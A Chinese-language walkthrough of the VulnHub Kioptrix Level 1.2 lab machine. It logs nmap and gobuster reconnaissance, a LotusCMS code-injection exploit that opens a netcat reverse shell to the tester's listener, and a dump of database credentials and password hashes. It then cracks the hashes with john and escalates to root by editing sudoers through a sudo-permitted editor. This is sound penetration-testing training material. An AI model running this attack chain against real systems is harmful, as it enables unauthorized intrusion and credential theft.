KIOPTRIX: LEVEL 1.2 (#3)
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
主机发现
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:09:20]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.17
Host is up (0.00071s latency).
nmap扫描
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:09:27]
$ sudo nmap --min-rate 10000 -p- 192.168.54.17
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:31:17:5F (VMware)
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:10:17]
$ sudo nmap -sT -sV -O -p22,80 192.168.54.17
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:31:17:5F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:10:43]
$ sudo nmap -sU -p22,80 192.168.54.17
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:31:17:5F (VMware)
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:17:14]
$ sudo nmap --script=vuln -p22,80 192.168.54.17
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
|_ http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /cache/: Potentially interesting folder
| /core/: Potentially interesting folder
| /icons/: Potentially interesting folder w/ directory listing
| /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /style/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-trace: TRACE is enabled
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.54.17
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.54.17:80/gallery/
| Form id:
| Form action: login.php
|
| Path: http://192.168.54.17:80/index.php?system=Admin
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.54.17:80/gallery/index.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.54.17:80/gallery/gadmin/
| Form id: username
| Form action: index.php?task=signin
|
| Path: http://192.168.54.17:80/index.php?system=Admin&page=loginSubmit
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.54.17:80/index.php?system=Blog&post=1281005380
| Form id: commentform
|_ Form action:
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:31:17:5F (VMware)
web渗透
目录爆破
# yunki @ yunki in ~ [14:11:49]
$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.54.17
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.17
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/21 14:12:35 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 355] [--> http://192.168.54.17/modules/]
/gallery (Status: 301) [Size: 355] [--> http://192.168.54.17/gallery/]
/data (Status: 403) [Size: 324]
/core (Status: 301) [Size: 352] [--> http://192.168.54.17/core/]
/style (Status: 301) [Size: 353] [--> http://192.168.54.17/style/]
/cache (Status: 301) [Size: 353] [--> http://192.168.54.17/cache/]
/phpmyadmin (Status: 301) [Size: 358] [--> http://192.168.54.17/phpmyadmin/]
/server-status (Status: 403) [Size: 333]
===============================================================
2023/03/21 14:13:33 Finished
===============================================================
发现是lotusCMS,在searchsploit上搜索,没有发现什么有用的信息,那就去google上搜索。发现github里有一个RCE的sh文件,这里下载下来查看。
https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh
里面有使用方式。
获得初始shell
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:40:05]
$ ./lotusRCE.sh 192.168.54.17
Path found, now to check for vuln....
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
About to try and inject reverse shell....
what IP to use?
192.168.54.128
What PORT?
443
OK, open your local listener and choose the method for back connect:
1) NetCat -e
2) NetCat /dev/tcp
3) NetCat Backpipe
4) NetCat FIFO
5) Exit
#? 1
监听端
# yunki @ yunki in ~ [14:37:30]
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.17] 59270
whoami
www-data
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
python -c "import pty;pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$ clear
clear
TERM environment variable not set.
www-data@Kioptrix3:/home/www/kioptrix3.com$ export TERM=xterm-color
export TERM=xterm-color
www-data@Kioptrix3:/home/www/kioptrix3.com$ ls
ls
cache data gallery index.php style
core favicon.ico gnu-lgpl.txt modules update.php
www-data@Kioptrix3:/home/www/kioptrix3.com$ cd gallery
cd gallery
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ ls
ls
BACK gfooter.php logout.php readme.html tags.php
db.sql gfunctions.php p.php recent.php themes
g.php gheader.php photos register.php version.txt
gadmin index.php photos.php scopbin vote.php
gallery.php install.BAK post_comment.php search.php
gconfig.php login.php profile.php slideshow.php
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}
}
}
?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$
获取更高权限的shell
发现mysql数据库内容,这里尝试ssh登录,发现失败,那就进入mysql查看后台数据。
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)
mysql> select * from dev_accounts;
select * from dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.01 sec)
mysql> select * from gallarific_users;
select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.00 sec)
登录后台。
没发现什么有用的信息。
john破解密码:
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:54:58]
$ john --format=Raw-MD5 info.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:55:21]
$ john --format=Raw-MD5 info.txt --show
?:Mast3r
?:starwars
2 password hashes cracked, 0 left
用ssh登录。结果用loneferret:starwars
登录成功!
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:58:47]
$ sudo ssh dreg@192.168.54.17
[sudo] yunki 的密码:
The authenticity of host '192.168.54.17 (192.168.54.17)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.17' (RSA) to the list of known hosts.
dreg@192.168.54.17's password:
Permission denied, please try again.
dreg@192.168.54.17's password:
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:59:15] C:130
$ sudo ssh loneferret@192.168.54.17
loneferret@192.168.54.17's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ whoami
loneferret
提权到root
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:59:15] C:130
$ sudo ssh loneferret@192.168.54.17
loneferret@192.168.54.17's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ whoami
loneferret
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
# sudo执行以下这个软件
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
(root) NOPASSWD: /bin/bash
loneferret@Kioptrix3:~$ sudo /bin/bash
root@Kioptrix3:~# whoami
root
root@Kioptrix3:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:31:17:5f brd ff:ff:ff:ff:ff:ff
inet 192.168.54.17/24 brd 192.168.54.255 scope global eth1
inet6 fe80::20c:29ff:fe31:175f/64 scope link
valid_lft forever preferred_lft forever